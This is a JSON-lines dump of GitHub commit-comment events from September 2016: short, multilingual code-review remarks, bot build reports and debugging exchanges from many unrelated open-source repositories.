{"id":"4529562628","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18933332,"position":null,"line":null,"path":null,"commit_id":"7c8e9c1c6dfe11d89ea5cfaa445333aab68d4cac","created_at":"2016-09-07T18:52:55Z","updated_at":"2016-09-07T18:52:55Z","body":"UTF8 should not contain BOM. There is no need for defining the byte ordering. BOM in UTF8 is needed in VERY special cases and I don't think, that Far help and language files are relating to such cases. If Far somehow wants to see BOM in UTF8, this logic must be changed."}},"created_at":"2016-09-07T18:52:55Z"}
{"id":"4529565807","type":"CommitCommentEvent","actor":{"login":"er0ck"},"repo":{"name":"puppetlabs/beaker-http"},"payload":{"comment":{"id":18933340,"position":null,"line":null,"path":null,"commit_id":"1890717d6c4e5b1c989b02a846d22aa1b2104ab6","created_at":"2016-09-07T18:53:31Z","updated_at":"2016-09-07T18:53:31Z","body":"yes!  dig it"}},"created_at":"2016-09-07T18:53:31Z"}
{"id":"4529568298","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18933346,"position":90,"line":90,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-07T18:54:00Z","updated_at":"2016-09-07T18:54:00Z","body":"HEJSAN"}},"created_at":"2016-09-07T18:54:00Z"}
{"id":"4529569309","type":"CommitCommentEvent","actor":{"login":"smallcrustation"},"repo":{"name":"smallcrustation/Trivia"},"payload":{"comment":{"id":18933348,"position":null,"line":null,"path":null,"commit_id":"5f06e7591a6b4012085ba4b27a685e4ce39b7b2e","created_at":"2016-09-07T18:54:12Z","updated_at":"2016-09-07T18:54:12Z","body":"updates redis cache"}},"created_at":"2016-09-07T18:54:12Z"}
{"id":"4529569681","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18933349,"position":null,"line":null,"path":null,"commit_id":"c6d257f328992e5e1c383d0bdff118f34aa48668","created_at":"2016-09-07T18:54:16Z","updated_at":"2016-09-07T18:54:16Z","body":"This is very strange. \r\n* we are not registering CQuest in serializer (line commented out for several years)\r\n* at the same time it was working before"}},"created_at":"2016-09-07T18:54:16Z"}
{"id":"4529570161","type":"CommitCommentEvent","actor":{"login":"andre-merzky"},"repo":{"name":"radical-cybertools/radical.pilot"},"payload":{"comment":{"id":18933351,"position":null,"line":null,"path":null,"commit_id":"c24a7cc0814b5c47f3b334cf38c609cc4e1c2d6f","created_at":"2016-09-07T18:54:21Z","updated_at":"2016-09-07T18:54:21Z","body":"hehe - no worries, I am glad someone is looking over the commits in the first place :D "}},"created_at":"2016-09-07T18:54:21Z"}
{"id":"4529570184","type":"CommitCommentEvent","actor":{"login":"sofar"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":18933352,"position":54,"line":1141,"path":"src/content_mapblock.cpp","commit_id":"e58a55aa82dfc66325a694dcc3519d3c0f3388a6","created_at":"2016-09-07T18:54:22Z","updated_at":"2016-09-07T18:54:22Z","body":"quite likely, yes, I'll see if that is the fix."}},"created_at":"2016-09-07T18:54:22Z"}
{"id":"4529574821","type":"CommitCommentEvent","actor":{"login":"ravey451"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":18933365,"position":null,"line":null,"path":null,"commit_id":"539007a217125a8b42993f7322515661debdfa15","created_at":"2016-09-07T18:55:17Z","updated_at":"2016-09-07T18:55:17Z","body":"Compiling GUI appears to be fixed as well - had trouble selecting fields before on Windows 10. :+1:"}},"created_at":"2016-09-07T18:55:17Z"}
{"id":"4529577741","type":"CommitCommentEvent","actor":{"login":"rost314"},"repo":{"name":"chrisz/pyhusmow"},"payload":{"comment":{"id":18933374,"position":null,"line":null,"path":null,"commit_id":"20ade04c161e6c1579c00bff82925fba672357de","created_at":"2016-09-07T18:55:51Z","updated_at":"2016-09-07T18:55:51Z","body":"I tried yesterday to use content-type application/json but I get an internal server error. Tried also some other stuff, but no luck with using json for requests :-(\r\nI was also considering to integrate with Home Assistant:\r\nhttps://community.home-assistant.io/t/appdaemon-q-a\r\n"}},"created_at":"2016-09-07T18:55:51Z"}
{"id":"4529582185","type":"CommitCommentEvent","actor":{"login":"salix5"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18933388,"position":null,"line":null,"path":null,"commit_id":"3e0740b77c33cb0b4ec67e078f3532a21690771c","created_at":"2016-09-07T18:56:43Z","updated_at":"2016-09-07T18:56:43Z","body":"效果重置的用途可否解釋一下"}},"created_at":"2016-09-07T18:56:43Z"}
{"id":"4529585668","type":"CommitCommentEvent","actor":{"login":"zinaida911"},"repo":{"name":"zinaida911/hello-word"},"payload":{"comment":{"id":18933398,"position":2,"line":2,"path":"README.md","commit_id":"2f483c041ad9cc6f887154f21eb1a0459d816ac8","created_at":"2016-09-07T18:57:24Z","updated_at":"2016-09-07T18:57:24Z","body":"111"}},"created_at":"2016-09-07T18:57:24Z"}
{"id":"4529586849","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18933401,"position":26,"line":117,"path":"src/class/object_custom_viewlists.php","commit_id":"c4175ac18f6ee9d50887360b81da84a80e47408b","created_at":"2016-09-07T18:57:38Z","updated_at":"2016-09-07T18:57:38Z","body":"Could you talk me through this one? This change is incompatible with `objects.php` and `object_custom.php` and potentially breaks lots of things (at the minimum part of the legend, but maybe more). It also makes the code confusing; `$this->aColumns` in one situation is completely different from another situation. Perhaps there is a better way for this."}},"created_at":"2016-09-07T18:57:38Z"}
{"id":"4529589081","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18933405,"position":null,"line":null,"path":null,"commit_id":"f3d116f100224a6bfcce475c61abe2ffa8e2e497","created_at":"2016-09-07T18:58:04Z","updated_at":"2016-09-07T18:58:04Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1758 of 1759 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-07T18:58:04Z"}
{"id":"4529591382","type":"CommitCommentEvent","actor":{"login":"Antim96"},"repo":{"name":"Antim96/Jar-Game"},"payload":{"comment":{"id":18933409,"position":null,"line":null,"path":null,"commit_id":"dc47fe75f68214e2cf827a98ebccb4ea72955f49","created_at":"2016-09-07T18:58:29Z","updated_at":"2016-09-07T18:58:29Z","body":"Adding Available option for player"}},"created_at":"2016-09-07T18:58:29Z"}
{"id":"4529593683","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18933416,"position":null,"line":null,"path":null,"commit_id":"f3d116f100224a6bfcce475c61abe2ffa8e2e497","created_at":"2016-09-07T18:58:56Z","updated_at":"2016-09-07T18:58:56Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T18:58:56Z"}
{"id":"4529596372","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18933420,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T18:59:27Z","updated_at":"2016-09-07T18:59:27Z","body":"What account are you using? And can you also post the first few bytes of your API token so I can check it's the right one on my side? This works for me:\r\n\r\n```\r\nsdclient = SdcClient(sdc_token)\r\nres = sdclient.get_data_retention_info()\r\nprint res\r\n```\r\n\r\nI get the response I'd expect:\r\n\r\n```\r\n[True, {u'awsCloudWatch': [{u'to': 1473274260000000, u'from': 1473101820000000, u'sampling': 60000000}, {u'to': 1473274200000000, u'from': 1472064600000000, u'sampling': 600000000}, {u'to': 1473271200000000, u'from': 1465495200000000, u'sampling': 3600000000}, {u'to': 1473206400000000, u'from': 1442102400000000, u'sampling': 86400000000}], u'agents': [{u'to': 1473274625000000, u'from': 1473260235000000, u'sampling': 1000000}, {u'to': 1473274560000000, u'from': 1473101760000000, u'sampling': 60000000}, {u'to': 1473274200000000, u'from': 1472064600000000, u'sampling': 600000000}, {u'to': 1473271200000000, u'from': 1468087200000000, u'sampling': 3600000000}, {u'to': 1473206400000000, u'from': 1442102400000000, u'sampling': 86400000000}]}]\r\n```\r\n\r\n(I'm on master)"}},"created_at":"2016-09-07T18:59:27Z"}
{"id":"4529597327","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18933421,"position":15,"line":23,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T18:59:38Z","updated_at":"2016-09-07T18:59:38Z","body":"I guess we will be getting all those details as we prune over the document. So far all we have is a layout of how we would like this to begin and then specifics will come as we develop it."}},"created_at":"2016-09-07T18:59:38Z"}
{"id":"4529599870","type":"CommitCommentEvent","actor":{"login":"austinkelleher"},"repo":{"name":"austinkelleher/dynograte"},"payload":{"comment":{"id":18933425,"position":null,"line":null,"path":null,"commit_id":"e2b3db61ed2747f672c52c19f2dcd228fa7f5b6d","created_at":"2016-09-07T19:00:07Z","updated_at":"2016-09-07T19:00:07Z","body":"Good catch @wenkesj . Typo. Fixed in https://github.com/austinkelleher/dynograte/commit/caa90443b54e019afe44ae8186c6d636f706f544 "}},"created_at":"2016-09-07T19:00:07Z"}
{"id":"4529600651","type":"CommitCommentEvent","actor":{"login":"kduske"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":18933426,"position":null,"line":null,"path":null,"commit_id":"539007a217125a8b42993f7322515661debdfa15","created_at":"2016-09-07T19:00:17Z","updated_at":"2016-09-07T19:00:17Z","body":"Oh, that's interesting. I had seen that problem, good to hear that it's fixed. "}},"created_at":"2016-09-07T19:00:17Z"}
{"id":"4529601477","type":"CommitCommentEvent","actor":{"login":"Bitti09"},"repo":{"name":"F-AOSP/manifest"},"payload":{"comment":{"id":18933432,"position":null,"line":null,"path":null,"commit_id":"dcaf715d7b5deea2738c0d928843dca915501a90","created_at":"2016-09-07T19:00:24Z","updated_at":"2016-09-07T19:00:24Z","body":"@Alberto97  revival of F-AOSP for qcom/caf devices? :+1: "}},"created_at":"2016-09-07T19:00:24Z"}
{"id":"4529603579","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18933435,"position":104,"line":282,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T19:00:46Z","updated_at":"2016-09-07T19:00:46Z","body":"Same thing as my other comment:\r\n\r\n```\r\nsdclient = SdcClient(sdc_token)\r\nres = sdclient.get_dashboards()\r\nprint res\r\n```\r\n\r\n```\r\n[True, {u'dashboards': [{u'isShared': True, u'modifiedOn': 1473194777000, u'fi...\r\n```"}},"created_at":"2016-09-07T19:00:46Z"}
{"id":"4529611694","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18933492,"position":74,"line":144,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T19:02:17Z","updated_at":"2016-09-07T19:02:17Z","body":"I also checked this one and I get:\r\n\r\n```\r\n[True, [u'cloudProvider.tag.Name', u'container.image', u'container.id']]\r\n```\r\n\r\nWhich is expected"}},"created_at":"2016-09-07T19:02:17Z"}
{"id":"4529615344","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18933530,"position":50,"line":58,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T19:02:56Z","updated_at":"2016-09-07T19:02:56Z","body":"I was thinking security and privacy properties should be placed where they are relevant and described in a specific section where we define what each property means in the context of this protocol. See #16."}},"created_at":"2016-09-07T19:02:56Z"}
{"id":"4529620340","type":"CommitCommentEvent","actor":{"login":"pminos"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18933580,"position":51,"line":205,"path":"languagetool-standalone/src/main/java/org/languagetool/gui/LanguageToolSupport.java","commit_id":"f08b52c0152241aa5178e8249149a26a16b625ac","created_at":"2016-09-07T19:03:53Z","updated_at":"2016-09-07T19:03:53Z","body":"Exactly. Thanks, I fixed it."}},"created_at":"2016-09-07T19:03:53Z"}
{"id":"4529624146","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18933612,"position":null,"line":null,"path":null,"commit_id":"8051ca162d31eb0667c3b32a34289ede04e3d393","created_at":"2016-09-07T19:04:36Z","updated_at":"2016-09-07T19:04:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HIOBokQvRM2UbDkDkU2psg"}},"created_at":"2016-09-07T19:04:36Z"}
{"id":"4529632179","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18933696,"position":140,"line":128,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T19:06:10Z","updated_at":"2016-09-07T19:06:10Z","body":"I used katex for my book before, it can render with markdown, not sure if\nwe should have math expression or change it to only text definition because\nrfc usually doesn't has math expression.\n\n2016年9月7日 下午12:44，\"Chelsea Komlo\" <notifications@github.com>写道：\n\n> Hey- is there better markdown notation for mathematical operations?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/twstrike/otrv4/commit/4c94da9242a80ca74c7cc5aec78a58bdd734682c#commitcomment-18932329>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABn5xG2ohd7380v0_C1WyDbmVtc8ptDyks5qnvfqgaJpZM4J3Le2>\n> .\n>\n"}},"created_at":"2016-09-07T19:06:10Z"}
{"id":"4529632771","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18933702,"position":null,"line":null,"path":null,"commit_id":"89809b7d59dd2505cd1eda89777394850665f990","created_at":"2016-09-07T19:06:17Z","updated_at":"2016-09-07T19:06:17Z","body":"This experiment attempted to provide `rotlImmediate` and `rotrImmediate` using a template parameter for the rotate amount."}},"created_at":"2016-09-07T19:06:17Z"}
{"id":"4529639340","type":"CommitCommentEvent","actor":{"login":"jackcucu"},"repo":{"name":"jackcucu/Test"},"payload":{"comment":{"id":18933731,"position":11,"line":72,"path":"app/src/main/java/com/jack/test/MainActivity.java","commit_id":"c2d64e0a9f3b5d8b6c21cd86e6d6206074854dea","created_at":"2016-09-07T19:07:33Z","updated_at":"2016-09-07T19:07:33Z","body":"good work\r\n"}},"created_at":"2016-09-07T19:07:33Z"}
{"id":"4529640769","type":"CommitCommentEvent","actor":{"login":"emanuelschuetze"},"repo":{"name":"OpenSlides/OpenSlides"},"payload":{"comment":{"id":18933743,"position":34,"line":49,"path":"openslides/motions/migrations/0003_auto_20160903_2216.py","commit_id":"e2eee664b1ab3191e1711f3dbdb35ec754e15f06","created_at":"2016-09-07T19:07:50Z","updated_at":"2016-09-07T19:07:50Z","body":"\"Refer to committee\" sounds more used - instead \"Reference to...\". See http://www.linguee.de/deutsch-englisch/search?source=auto&query=Refer+to+committee"}},"created_at":"2016-09-07T19:07:50Z"}
{"id":"4529641311","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18933751,"position":10,"line":6,"path":"app/controllers/feed/imports_controller.rb","commit_id":"c36e355a0d0dca543060c1d1ede97e38d2f09a05","created_at":"2016-09-07T19:07:57Z","updated_at":"2016-09-07T19:07:57Z","body":"This is method that receives the file and sets the strategy, so that it is possible to easily reset the strategy. Though, now that I think about it, it wasn't that necessary in this case."}},"created_at":"2016-09-07T19:07:57Z"}
{"id":"4529641813","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18933761,"position":null,"line":null,"path":null,"commit_id":"8051ca162d31eb0667c3b32a34289ede04e3d393","created_at":"2016-09-07T19:08:03Z","updated_at":"2016-09-07T19:08:03Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WOKfyQH_QhG24XJtjmy8xg"}},"created_at":"2016-09-07T19:08:03Z"}
{"id":"4529646735","type":"CommitCommentEvent","actor":{"login":"nyradr"},"repo":{"name":"nyradr/decc"},"payload":{"comment":{"id":18933789,"position":null,"line":null,"path":null,"commit_id":"4807145eafdd6b675c257f99cbf080649df89935","created_at":"2016-09-07T19:09:02Z","updated_at":"2016-09-07T19:09:02Z","body":"ps : the dht will be CHORD like"}},"created_at":"2016-09-07T19:09:02Z"}
{"id":"4529649878","type":"CommitCommentEvent","actor":{"login":"fabaff"},"repo":{"name":"home-assistant/home-assistant.github.io"},"payload":{"comment":{"id":18933794,"position":32,"line":27,"path":"source/_components/pilight.markdown","commit_id":"fc17f1806544c2d63cfcaed42592b40f647835d9","created_at":"2016-09-07T19:09:41Z","updated_at":"2016-09-07T19:09:41Z","body":"Thanks. Should be fixed by https://github.com/home-assistant/home-assistant.github.io/commit/d95ed6156cdc9c618ba7e7a6e97793a3af92cd33"}},"created_at":"2016-09-07T19:09:41Z"}
{"id":"4529650665","type":"CommitCommentEvent","actor":{"login":"Labradoodle-360"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18933796,"position":null,"line":null,"path":null,"commit_id":"65559629f0e333c93819a0b0b9cea2cb94875ad8","created_at":"2016-09-07T19:09:49Z","updated_at":"2016-09-07T19:09:49Z","body":"And mine prefers to follow how SMF traditionally does things."}},"created_at":"2016-09-07T19:09:49Z"}
{"id":"4529652132","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18933805,"position":7,"line":11,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-07T19:10:08Z","updated_at":"2016-09-07T19:10:08Z","body":"Du behöver inte vara så specifik (div#outside) dessutom när du jobbar med CSS så ska du använda class och inte ID så gör om till .outside istället"}},"created_at":"2016-09-07T19:10:08Z"}
{"id":"4529652194","type":"CommitCommentEvent","actor":{"login":"saintstack"},"repo":{"name":"xfxyjwf/protobuf"},"payload":{"comment":{"id":18933806,"position":null,"line":null,"path":null,"commit_id":"ed3ecd9693b6918630362727caf0bd3f1731cb03","created_at":"2016-09-07T19:10:10Z","updated_at":"2016-09-07T19:10:10Z","body":"Only takes ByteBuffers. I want to pass byte arrays. Thanks."}},"created_at":"2016-09-07T19:10:10Z"}
{"id":"4529656687","type":"CommitCommentEvent","actor":{"login":"Ramonbers"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":18933842,"position":46,"line":89,"path":"src/main/java/com/gmail/nossr50/listeners/BlockListener.java","commit_id":"01a8a199d2a24021269a1812b34e8c0816be205a","created_at":"2016-09-07T19:10:58Z","updated_at":"2016-09-07T19:10:58Z","body":"Nice\r\n"}},"created_at":"2016-09-07T19:10:58Z"}
{"id":"4529657642","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18933851,"position":10,"line":14,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-07T19:11:10Z","updated_at":"2016-09-07T19:11:10Z","body":"Samma här, gör om alla ID:n till klasser istället "}},"created_at":"2016-09-07T19:11:10Z"}
{"id":"4529659573","type":"CommitCommentEvent","actor":{"login":"khipkin"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18933871,"position":null,"line":null,"path":null,"commit_id":"da8f0373ba653a36c9d6a353851ec33f3772e372","created_at":"2016-09-07T19:11:32Z","updated_at":"2016-09-07T19:11:32Z","body":":heart_eyes: :tada: :+1: "}},"created_at":"2016-09-07T19:11:32Z"}
{"id":"4529665386","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18933915,"position":93,"line":93,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-07T19:12:40Z","updated_at":"2016-09-07T19:12:40Z","body":"Lägg till en container runt h1 & h2 för att lättare kunna flytta på båda"}},"created_at":"2016-09-07T19:12:40Z"}
{"id":"4529666817","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18933920,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-07T19:12:57Z","updated_at":"2016-09-07T19:12:57Z","body":"@svladykin I've got the UUID-related change in Value.java and the test in TestValue.java ready to go.\r\n\r\nI tried adding some testing to the TestPgServer.java in the testBinaryTypes( ) method, but it looks like the Postgres driver requires emulation of at least Postgres 8.3 to handle UUID types cleanly, and H2 only supports 8.1.4 at the moment.  I tried changing the advertised version to 8.3, but things started breaking all over in the test cases, so that's not a good idea.\r\n\r\nHow do I go ahead and submit a pull request without being able to push a commit to GitHub?"}},"created_at":"2016-09-07T19:12:57Z"}
{"id":"4529670421","type":"CommitCommentEvent","actor":{"login":"AndrewMcFinley"},"repo":{"name":"AndrewMcFinley/vstu-lections"},"payload":{"comment":{"id":18933951,"position":null,"line":null,"path":null,"commit_id":"97036e02c384b3d71b7ad566c428690eb164f0bc","created_at":"2016-09-07T19:13:39Z","updated_at":"2016-09-07T19:13:39Z","body":"Ты прям как говно, только человек"}},"created_at":"2016-09-07T19:13:39Z"}
{"id":"4529670495","type":"CommitCommentEvent","actor":{"login":"wankdanker"},"repo":{"name":"mhmeadows63/node-dns-express"},"payload":{"comment":{"id":18933952,"position":59,"line":74,"path":"index.js","commit_id":"d9d09e742812b52d8311c474848bfde451edc00f","created_at":"2016-09-07T19:13:40Z","updated_at":"2016-09-07T19:13:40Z","body":"This would be\r\n```js\r\n//var close = DNS.events.close.bind(DNS.events);\r\n//DNS.events.close = function () {\r\n//\treturn close.apply(DNS.events, arguments);\r\n//};\r\n```\r\n\r\nRight?"}},"created_at":"2016-09-07T19:13:40Z"}
{"id":"4529672203","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18933963,"position":null,"line":null,"path":null,"commit_id":"796019f74b424551e08359fdbdd45ca008963098","created_at":"2016-09-07T19:13:59Z","updated_at":"2016-09-07T19:13:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JgQfNKs9SQ24BckUKFmZZw"}},"created_at":"2016-09-07T19:13:59Z"}
{"id":"4529672720","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18933965,"position":34,"line":34,"path":"observer.beta1/observer_code/ADialog.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T19:14:06Z","updated_at":"2016-09-07T19:14:06Z","body":"Николай, не сочти за придирчивость, но переменные называть с приставкой \"my\" - несерьезно. Это дурацкие примеры в учебниках обычно пишутся так, но это совсем нерабочий вариант названия переменной. Помним, что даже через время, взглянув на код, ты должен вспомнить, что хранит в себе та или иная переменная."}},"created_at":"2016-09-07T19:14:06Z"}
{"id":"4529673690","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18933972,"position":50,"line":459,"path":"src/FSAL/FSAL_GPFS/export.c","commit_id":"c7894920146528435490a25c32c8ead933bac367","created_at":"2016-09-07T19:14:16Z","updated_at":"2016-09-07T19:14:16Z","body":"Please note that the latest export.c from 2.4 has this line \"ops->alloc_state = gpfs_alloc_state;\", hence it has come here as part of the commit."}},"created_at":"2016-09-07T19:14:16Z"}
{"id":"4529676141","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18933988,"position":null,"line":null,"path":null,"commit_id":"ab4c7fad55bb8506949e0d3990bc838f822fe1d9","created_at":"2016-09-07T19:14:44Z","updated_at":"2016-09-07T19:14:44Z","body":"Many thanks to @eisbaerBorealis for this suggestion"}},"created_at":"2016-09-07T19:14:44Z"}
{"id":"4529676292","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18933989,"position":null,"line":null,"path":null,"commit_id":"796019f74b424551e08359fdbdd45ca008963098","created_at":"2016-09-07T19:14:46Z","updated_at":"2016-09-07T19:14:46Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NGKF_3DgTsKz-HfuGe5OWw"}},"created_at":"2016-09-07T19:14:46Z"}
{"id":"4529678133","type":"CommitCommentEvent","actor":{"login":"colinharris05"},"repo":{"name":"BeschtaBrandon/BeschtaBrandon.github.io"},"payload":{"comment":{"id":18934006,"position":5,"line":33,"path":"experience.html","commit_id":"57474f618b8aafa3ead5df2bf1523293991558df","created_at":"2016-09-07T19:15:09Z","updated_at":"2016-09-07T19:15:09Z","body":"The me.jpg is much better now haha. But, I noticed that the image ratio is \r\nW: 1080px | H: 720px in the original image.\r\n\r\nSince that's a little too big on the site, you should make it a scaled down version. I tried out a W: 300px by 450px and it looks great. Keep the 1.5 ratio though or it will look messed up"}},"created_at":"2016-09-07T19:15:09Z"}
{"id":"4529678434","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18934009,"position":47,"line":47,"path":"atom/browser/api/atom_api_autofill.h","commit_id":"1e3574bca24cdc95745d420563fd859cb3d795d2","created_at":"2016-09-07T19:15:13Z","updated_at":"2016-09-07T19:15:13Z","body":"Better here to do const std::string &guid"}},"created_at":"2016-09-07T19:15:13Z"}
{"id":"4529678958","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18934013,"position":51,"line":51,"path":"atom/browser/api/atom_api_autofill.h","commit_id":"1e3574bca24cdc95745d420563fd859cb3d795d2","created_at":"2016-09-07T19:15:18Z","updated_at":"2016-09-07T19:15:18Z","body":"ditto"}},"created_at":"2016-09-07T19:15:18Z"}
{"id":"4529680558","type":"CommitCommentEvent","actor":{"login":"njelic04"},"repo":{"name":"vukicas/project1"},"payload":{"comment":{"id":18934022,"position":40,"line":40,"path":"RouletteApplication/RouletteBoardControl.swift","commit_id":"3d3f409bed10c15dd2e11537e51fc5f6dbe79fb3","created_at":"2016-09-07T19:15:34Z","updated_at":"2016-09-07T19:15:34Z","body":"Napravis funkciju koja setup-uje UIButton da izbacis ovaj boilerplate kod Npr:\r\n`func setup(button: UIButton, withImage: UIImage, borderColor color: CGColor) {}`\r\nNaravno prosledis sve argumente koji ti trebaju i smanjis code base za 400 linija"}},"created_at":"2016-09-07T19:15:34Z"}
{"id":"4529682378","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18934037,"position":47,"line":47,"path":"observer.beta1/observer_code/ADialog.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T19:15:57Z","updated_at":"2016-09-07T19:15:57Z","body":"То же и с названиями классов. 2-е минуты подумать над КОРОТКИМ но ЁМКИМ названием - потом экономия времени на попытках вспомнить что хотел сказать автор :) или какой логикой руководствовался."}},"created_at":"2016-09-07T19:15:57Z"}
{"id":"4529690963","type":"CommitCommentEvent","actor":{"login":"dimadsgn"},"repo":{"name":"dimadsgn/126260-sedona"},"payload":{"comment":{"id":18934084,"position":null,"line":null,"path":null,"commit_id":"8581523d10e70eaef5bf9402303fb40aeb8adbe8","created_at":"2016-09-07T19:17:36Z","updated_at":"2016-09-07T19:17:36Z","body":"+ добавил style.min.css"}},"created_at":"2016-09-07T19:17:36Z"}
